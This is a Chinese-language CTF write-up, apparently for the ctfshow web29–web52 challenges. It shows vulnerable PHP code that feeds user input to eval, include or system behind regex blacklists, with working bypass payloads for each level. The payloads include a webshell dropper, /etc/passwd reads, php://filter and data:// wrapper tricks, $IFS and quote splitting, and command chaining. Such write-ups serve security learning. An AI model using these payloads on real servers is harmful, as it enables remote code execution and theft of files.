目录

web29

web30

web31

web32

web33

web34

web35

web36

web37

web38

web39

web40

web41

web42

web43

web44

web45

web46

web47

web48

web49

web50

web51

web52

---

web29

<?php
error_reporting(0);
if(isset($_GET['c'])){$c = $_GET['c'];if(!preg_match("/flag/i", $c)){eval($c);}}else{highlight_file(__FILE__);
}

代码解释判断是否存在GET型参数c 如果存在赋值给变量c 如果参数值没有匹配到字符串flag则执行代码 eval()

直接传参

第一种方法

?c=system('ls');

?c=system('tac f*');

第二种

?c=system('cp f* 1.txt');

访问1.txt

第三种

highlight_file(next(array_reverse(scandir("."))));

解释：具体来说，scandir(".") 函数会返回当前文件所在目录下的所有文件和目录的名称列表，并以数组的形式返回。然后，array_reverse() 函数会将该数组翻转，使得最后修改的文件排在数组的第一个位置。接着，next() 函数会返回该数组的第一个元素，即最后修改的文件的名称。

第四种 尝试写木马

file_put_contents("alb34t.php",%20%27<?php%20eval($_POST["cmd"]);%20?>%27); 

第五种 

这里的eval也可以换为include，并且可以不用括号。但是仅仅可以用来读文件了。

include可以和过滤器联合使用
?c=include$_GET[1]?>&1=php://filter/read=convert.base64-encode/resource=flag.php

知识点 

1 eval函数可以理解为代码执行 动态执行php代码

2 system函数可以理解为命令执行 执行shell命令

3 php最后一个语句可以没有分号

eval(phpinfo()) 无输出结果

eval(phpinfo();)有输出结果

eval(phpinfo()?>) 有输出结果

4 file _get_contents() 获取文件内容 以字符串方式返回 这道题屏蔽了flag.php所以不能使用这个

web30

<?php
error_reporting(0);
if(isset($_GET['c'])){$c = $_GET['c'];if(!preg_match("/flag|system|php/i", $c)){eval($c);}}else{highlight_file(__FILE__);
}

?c=`cp f* 1.txt`;

知识点：反引号在php中类似于system函数 可以执行shell命令

web31

<?php
error_reporting(0);
if(isset($_GET['c'])){$c = $_GET['c'];if(!preg_match("/flag|system|php|cat|sort|shell|\.| |\'/i", $c)){eval($c);}}else{highlight_file(__FILE__);
}

 连点都被过滤了

可以嵌套一个eval

?c=eval($_GET[1]);&1=phpinfo();

为什么要嵌套?c=$_GET[1]&1=phpinfo();不行嘛

不行 如果不使用函数是无法获取到变量的 简单理解就行不要想深

?c=eval($_GET[1]);&1=system('ls');

?c=eval($_GET[1]);&1=system('tac f*');

知识点 这就逃逸出来了参数1的值不属于参数c的内容 所以检测不到

第二种方法

?c=show_source(next(array_reverse(scandir(pos(localeconv())))));

pos(localeconv())返回一个. 硬背就行

scandir()获取当前目录下的文件名组成一个数组 按照顺序进行排序 最后修改在最后面

array_reverse()翻转数组

next()获取第一个数组的值

show_source()展示页面源代码

web32

<?php
error_reporting(0);
if(isset($_GET['c'])){$c = $_GET['c'];if(!preg_match("/flag|system|php|cat|sort|shell|\.| |\'|\`|echo|\;|\(/i", $c)){eval($c);}}else{highlight_file(__FILE__);
}

空格单引号反引号 还有括号都给禁用了 

知识点:include可以读取非php文件内容输出直接输出到页面，当使用 include 包含一个非 PHP 文件时，PHP 解释器会将这个文件的内容视为纯文本，并将其直接输出到浏览器

/?c=include%0a$_GET[1]?>&1=/etc/passwd 输出该文件内容

二进制文件也是可以输出的/?c=include%0a$_GET[1]?>&1=/bin/ls

?c=include%0a$_GET[1]?>&1=flag.php 虽然包含了但是因为是php文件所以不输出 

但是可以使用过滤器

php://filter/read=convert.base64-encode/resource=flag.php

?c=include%0a$_GET[1]?>&1=php://filter/read=convert.base64-encode/resource=flag.php

我的理解就是 过滤器获取到php文件的内容后生成了base64编码后的字符串 include包含进来 无法判定是php代码 所以直接进行输出 然后进行解码即可

web33

<?php
error_reporting(0);
if(isset($_GET['c'])){$c = $_GET['c'];if(!preg_match("/flag|system|php|cat|sort|shell|\.| |\'|\`|echo|\;|\(|\"/i", $c)){eval($c);}}else{highlight_file(__FILE__);
}

使用上一关payload即可多加了一个双引号 无影响

使用require也行和include一个效果都是用于文件包含

?c=require%0a$_GET[1]?>&1=php://filter/read=convert.base64-encode/resource=flag.php

web34

<?php
error_reporting(0);
if(isset($_GET['c'])){$c = $_GET['c'];if(!preg_match("/flag|system|php|cat|sort|shell|\.| |\'|\`|echo|\;|\(|\:|\"/i", $c)){eval($c);}}else{highlight_file(__FILE__);
}

过滤了冒号 没用 上一题payload也行 因为他识别c的内容 虽然通过1给c传值 但是1的值不属于c 

?c=require%0a$_GET[1]?>&1=php://filter/read=convert.base64-encode/resource=flag.php

知识点

?c=print%0a$_GET[1]?>&1=phpinfo() 会输出字符串phpinfo()

web35

<?php
error_reporting(0);
if(isset($_GET['c'])){$c = $_GET['c'];if(!preg_match("/flag|system|php|cat|sort|shell|\.| |\'|\`|echo|\;|\(|\:|\"|\<|\=/i", $c)){eval($c);}}else{highlight_file(__FILE__);
}

又过滤了<和= 没用 依旧使用上一题payload即可

?c=require%0a$_GET[1]?>&1=php://filter/read=convert.base64-encode/resource=flag.php

web36

过滤了1-9

第一种方法

?c=require%0a$_GET[a]?>&a=php://filter/read=convert.base64-encode/resource=flag.php

第二种方法

data://text/plain 是一种 PHP 中的数据流协议，它允许将数据作为 URL 直接嵌入到 PHP 代码中。具体来说，这个协议用于将纯文本数据嵌入到 PHP 脚本中，而不必将其放在单独的文件中

?c=include%0a$_GET[a]?>&a=data://text/plain,<?php system("cat fla*");?>

web37

<?php
error_reporting(0);
if(isset($_GET['c'])){$c = $_GET['c'];if(!preg_match("/flag/i", $c)){include($c);echo $flag;}}else{highlight_file(__FILE__);
}

包含一个文件$c 显然$c的值不能是flag.php

那就使用伪协议

对于我的理解： 过程就是使用data伪协议传输数据流 include包含这个数据流 包含进来服务器就会php识别出为php代码从而执行php代码 如果不是php代码include包含进来就自动输出到页面中

第一种方法

?c=data://text/plain,<?php%20system("cat%20fla*");?>

第二种方法

因为是过滤了flag还可以这么写

?c=data://text/plain;base64,PD9waHAgc3lzdGVtKCdjYXQgZmxhZy5waHAnKTs/Pg==

PD9waHAgc3lzdGVtKCdjYXQgZmxhZy5waHAnKTs/Pg===<?php system('cat flag.php');?>

过程就是data将数据传给变量c 然后include包含后 数据流进行解密然后执行代码

web38

<?php
error_reporting(0);
if(isset($_GET['c'])){$c = $_GET['c'];if(!preg_match("/flag|php|file/i", $c)){include($c);echo $flag;}}else{highlight_file(__FILE__);
}

禁用了php 可以使用上一题的第二种方法也可以

?c=data://text/plain;base64,PD9waHAgc3lzdGVtKCdjYXQgZmxhZy5waHAnKTs/Pg==

上一题的第一种方法改变一下写法也可以

?c=data://text/plain,<?=system("tac fla*")?>

web39

<?php
error_reporting(0);
if(isset($_GET['c'])){$c = $_GET['c'];if(!preg_match("/flag/i", $c)){include($c.".php");}}else{highlight_file(__FILE__);
}

强制在include后方加.php  无影响

?c=data://text/plain,<?php%20system("cat%20fla*");?>

举个例子 使用phpinfo() 

?c=data://text/plain,<?php%20phpinfo();?> 

include会包含 <?php%20phpinfo();?> .php 服务器识别出php代码从而执行默认会将phpinfo结果输出页面  然后.php字符串 前面也说了include包含纯文本内容会将页面内容输出 所以在最下方会输出.php

web40

<?php
if(isset($_GET['c'])){$c = $_GET['c'];if(!preg_match("/[0-9]|\~|\`|\@|\#|\\$|\%|\^|\&|\*|\（|\）|\-|\=|\+|\{|\[|\]|\}|\:|\'|\"|\,|\<|\.|\>|\/|\?|\\\\/i", $c)){eval($c);}}else{highlight_file(__FILE__);
}

get_defined_vars() 是一个 PHP 内置函数，用于返回当前作用域中所有已定义的变量和它们的值。

?c=print_r(get_defined_vars());

加上post参数1=phpinfo();

?c=print_r(next(get_defined_vars()));

输出

?c=print_r(array_pop(next(get_defined_vars())));

对数组的值进行弹出 也就是键值对 的值弹出

执行即可

?c=eval(array_pop(next(get_defined_vars())));

GET:  ?c=eval(array_pop(next(get_defined_vars())));

POST:1=system('ls');

GET:  ?c=eval(array_pop(next(get_defined_vars())));

POST:1=system('tac flag.php');

web41

有难度可以练习脚本 留着以后弄

web42

<?php
if(isset($_GET['c'])){$c=$_GET['c'];system($c." >/dev/null 2>&1");
}else{highlight_file(__FILE__);
}

system($c." >/dev/null 2>&1");

将$c的输出 输出到黑洞中 错误输出(2)输出到标准输出(1)输出的位置 也就代表标准输出和错误输出都输出到黑洞 

解决方案就是 双写绕过

?c=ls;ls 就变成了system(ls;ls." >/dev/null 2>&1"); 第二个ls的输出 输出到黑洞中 第一个ls正常输出到页面中 这个姿势就是双写绕过

或者

?c=tac%20flag.php%0a 就变成了

system(tac%20flag.php

." >/dev/null 2>&1");

这种格式 能输出 黑洞获取不到任何信息

或者

?c=cat%20flag.php;&2 和双写一个意思 就是正常输出第一个语句 然后&2>/dev/null

web43

<?php
if(isset($_GET['c'])){$c=$_GET['c'];if(!preg_match("/\;|cat/i", $c)){system($c." >/dev/null 2>&1");}
}else{highlight_file(__FILE__);
}

把分号过滤了 不能使用双写方式绕过

上一题的第二种方法或者换一个更有意思的姿势

?c=tac%20flag.php&& 就变成了

system(tac%20flag.php&&." >/dev/null 2>&1"); 

&& 和and差不多意思 前面的语句执行成功才会执行后面的语句

传参的时候要将&&进行url编码%26%26 因为&在传参中会被识别为参数的分隔符

web44

<?php
if(isset($_GET['c'])){$c=$_GET['c'];if(!preg_match("/;|cat|flag/i", $c)){system($c." >/dev/null 2>&1");}
}else{highlight_file(__FILE__);
}

过滤了flag 用通配符即可绕过

?c=tac%20fl*%26%26

?c=tac%20fl*%0a

知识点：nl和cat一样效果

web45

<?php
if(isset($_GET['c'])){$c=$_GET['c'];if(!preg_match("/\;|cat|flag| /i", $c)){system($c." >/dev/null 2>&1");}
}else{highlight_file(__FILE__);
}

多过滤了空格 使用%09 意思就是tab 四个空格的位置

?c=tac%09fl*%26%26

换一个姿势

?c=echo$IFS`tac%09fl*`%0A

echo$IFS $IFS里面包含空格制表符等 

翻译号的效果和system效果一样 

web46

<?php
if(isset($_GET['c'])){$c=$_GET['c'];if(!preg_match("/\;|cat|flag| |[0-9]|\\$|\*/i", $c)){system($c." >/dev/null 2>&1");}
}else{highlight_file(__FILE__);
}

不能有*和数字

换一个通配符?即可?c=tac%09fla?.php%26%26 

这个%09%26中的数字 是匹配不到的 因为到服务器端后 %09就变成tab键的四个空格 %26就变成&了

换一个姿势

?c=nl<fla%27%27g.php%7C%7C

将flag.php的内容 输入给nl 然后nl进行输出 

fl''ag代表的就是flag 

|| 有一个真则为真 

web47

<?php
if(isset($_GET['c'])){$c=$_GET['c'];if(!preg_match("/\;|cat|flag| |[0-9]|\\$|\*|more|less|head|sort|tail/i", $c)){system($c." >/dev/null 2>&1");}
}else{highlight_file(__FILE__);
}

禁用了很多输出字符的命令 但是依旧没有禁用tac nl使用上一题poyload即可

?c=nl<fla%27%27g.php%7C%7C

web48

<?php
if(isset($_GET['c'])){$c=$_GET['c'];if(!preg_match("/\;|cat|flag| |[0-9]|\\$|\*|more|less|head|sort|tail|sed|cut|awk|strings|od|curl|\`/i", $c)){system($c." >/dev/null 2>&1");}
}else{highlight_file(__FILE__);
}

过滤了更多读取文件的命令 依旧没有过tac nl 继续白嫖

这两道题告诉我们 木桶原则太重要了 只要有一个出现问题 其余再好也没用

?c=nl<fla%27%27g.php%7C%7C

web49

<?php
、if(isset($_GET['c'])){$c=$_GET['c'];if(!preg_match("/\;|cat|flag| |[0-9]|\\$|\*|more|less|head|sort|tail|sed|cut|awk|strings|od|curl|\`|\%/i", $c)){system($c." >/dev/null 2>&1");}
}else{highlight_file(__FILE__);
}

同理 说一嘴在这里传参直接传||就可以不用url编码也是可以的

?c=nl<fla%27%27g.php%7C%7C

?c=nl<fla%27%27g.php||

web50

<?php
if(isset($_GET['c'])){$c=$_GET['c'];if(!preg_match("/\;|cat|flag| |[0-9]|\\$|\*|more|less|head|sort|tail|sed|cut|awk|strings|od|curl|\`|\%|\x09|\x26/i", $c)){system($c." >/dev/null 2>&1");}
}else{highlight_file(__FILE__);
}

这个时候 x09 x26都没了 不影响我们的payload

?c=nl<fla%27%27g.php|| 

在这里又说一嘴 在这里为什么不能用?通配符 解释：nl不支持 所以使用两个单引号也行

web51

<?php
if(isset($_GET['c'])){$c=$_GET['c'];if(!preg_match("/\;|cat|flag| |[0-9]|\\$|\*|more|less|head|sort|tail|sed|cut|tac|awk|strings|od|curl|\`|\%|\x09|\x26/i", $c)){system($c." >/dev/null 2>&1");}
}else{highlight_file(__FILE__);
}

可算过滤了tac了 但是还有nl

?c=nl<fla%27%27g.php|| 

web52

<?php
if(isset($_GET['c'])){$c=$_GET['c'];if(!preg_match("/\;|cat|flag| |[0-9]|\*|more|less|head|sort|tail|sed|cut|tac|awk|strings|od|curl|\`|\%|\x09|\x26|\>|\</i", $c)){system($c." >/dev/null 2>&1");}
}else{highlight_file(__FILE__);
}

过滤了<  但是没有过滤$

nc用不了了

知识点$IFS是可以被正则匹配到的 $IFS在shell中代表空格制表符 所以前提是system执行时他才代表制表符等

?c=cp$IFSfla?.php$IFSa.txt|| 不行

可能就是没有写权限 试一下mv 也不行?c=mv$IFSfla?.php$IFSa.txt|| 也不行

换一种写法 就可以了 也不知道什么原因 硬背就行 当是一个姿势 知道原因了

如果不使用花括号，shell 可能会将变量的名称与其他字符连接在一起，导致无法正确解析变量

?c=cp${IFS}fla?.php${IFS}a.txt||

?c=mv${IFS}fla?.php${IFS}a.txt||

flag并没有在里面 看来是假的flag

?c=ls$IFS/||

?c=pwd||

?c=mv${IFS}/fla?${IFS}/var/www/html/d.txt|| 不可以

?c=cp${IFS}/fla?${IFS}d.txt|| 在根目录下不存在

?c=cp${IFS}/fla?${IFS}/var/www/html/d.txt|| 可以

换个姿势 前提知道文件位置 nl用来读取文件

?c=nl${IFS}/fla%27%27g||